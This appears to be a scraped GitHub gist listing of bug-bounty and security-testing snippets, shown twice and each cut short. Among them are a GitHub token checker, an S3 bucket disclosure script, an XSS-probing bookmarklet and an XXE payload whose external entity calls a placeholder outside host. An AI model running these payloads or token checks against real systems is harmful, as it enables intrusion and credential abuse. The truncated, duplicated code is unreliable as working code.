Luke Stephens (hakluke) hakluke

## waywords.go
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"os"
	"strings"
)

## ghcheck
#!/bin/bash

GREEN='\033[0;32m'
RED='\033[0;31m'
END='\033[0m'

request=$(curl -s -u "hehe:$1" https://api.github.com/user)
name=$(echo "$request" | jq -r ".login" 2> /dev/null)
if [[ $name == "null" ]]; then
	echo -e "${RED}Not a GitHub access token.${END}"

## bucket-disclose.sh
#!/bin/bash

# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"

## download_new_domains.py
from pymongo import MongoClient
import json, os, time, signal, threading, sys
from datetime import datetime, timedelta
from gglsbl import SafeBrowsingList

import requests
from datetime import datetime
from datetime import datetime, timedelta
from virus_total_apis import PrivateApi, PublicApi
import argparse

## XSSbookmarklet.js
javascript:(function()%7Bvar j %3D document.getElementsByTagName("input")%3Bif (document.location.href.indexOf("%3F")>-1)%7Bvar l %3D "%26"%3B%7Delse%7Bvar l %3D "%3F"%3B%7Dfor (i%3D0%3Bi<j.length%3Bi%2B%2B)%7Bl%2B%3Dj%5Bi%5D.getAttribute("name")%2B'%3D"><test1234>%26'%7Ddocument.location %3D document.location%2Bl%7D)()

## bulk_dns_check.py
# Usage: ./dns_check.py <list_of_domain_names.txt>
import dns.resolver
import requests
import re
import json
import sys

resolver = dns.resolver.Resolver()
resolver.timeout = 5
resolver.lifetime = 5

## limit_goroutines_with_semaphores.go
var (
  concurrency = 5
  semaChan = make(chan struct{}, concurrency)
)

func doWork(item int) {
  semaChan <- struct{}{} // block while full
  go func() {
    defer func() {
      <-semaChan // read releases a slot

## clone-popular.sh
#!/bin/bash

mkdir -p popular

while read repo;
do
	[ -d "popular/$repo" ] || svn export "https://plugins.svn.wordpress.org/$repo/trunk" "popular/$repo"
done <popular-plugins.txt

## go-build-all
#!/bin/bash
#
# GoLang cross-compile snippet for Go 1.6+ based loosely on Dave Chaney's cross-compile script:
# http://dave.cheney.net/2012/09/08/an-introduction-to-cross-compilation-with-go
#
# To use:
#
#   $ cd ~/path-to/my-awesome-project
#   $ go-build-all
#

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
	#!/bin/bash

	GREEN='\033[0;32m'
	RED='\033[0;31m'
	END='\033[0m'

	request=$(curl -s -u "hehe:$1" https://api.github.com/user)
	name=$(echo "$request" \| jq -r ".login" 2> /dev/null)
	if [[ $name == "null" ]]; then
	echo -e "${RED}Not a GitHub access token.${END}"
	#!/bin/bash

	# Written by Frans Rosén (twitter.com/fransrosen)
	_debug="$2" #turn on debug
	_timeout="20"
	#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
	_aws_key="AKIA..."
	H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
	H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
	from pymongo import MongoClient
	import json, os, time, signal, threading, sys
	from datetime import datetime, timedelta
	from gglsbl import SafeBrowsingList

	import requests
	from datetime import datetime
	from datetime import datetime, timedelta
	from virus_total_apis import PrivateApi, PublicApi
	import argparse
	# Usage: ./dns_check.py <list_of_domain_names.txt>
	import dns.resolver
	import requests
	import re
	import json
	import sys

	resolver = dns.resolver.Resolver()
	resolver.timeout = 5
	resolver.lifetime = 5
	var (
	concurrency = 5
	semaChan = make(chan struct{}, concurrency)
	)

	func doWork(item int) {
	semaChan <- struct{}{} // block while full
	go func() {
	defer func() {
	<-semaChan // read releases a slot
	#!/bin/bash

	mkdir -p popular

	while read repo;
	do
	[ -d "popular/$repo" ] \|\| svn export "https://plugins.svn.wordpress.org/$repo/trunk" "popular/$repo"
	done <popular-plugins.txt
	#!/bin/bash
	#
	# GoLang cross-compile snippet for Go 1.6+ based loosely on Dave Chaney's cross-compile script:
	# http://dave.cheney.net/2012/09/08/an-introduction-to-cross-compilation-with-go
	#
	# To use:
	#
	# $ cd ~/path-to/my-awesome-project
	# $ go-build-all
	#
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>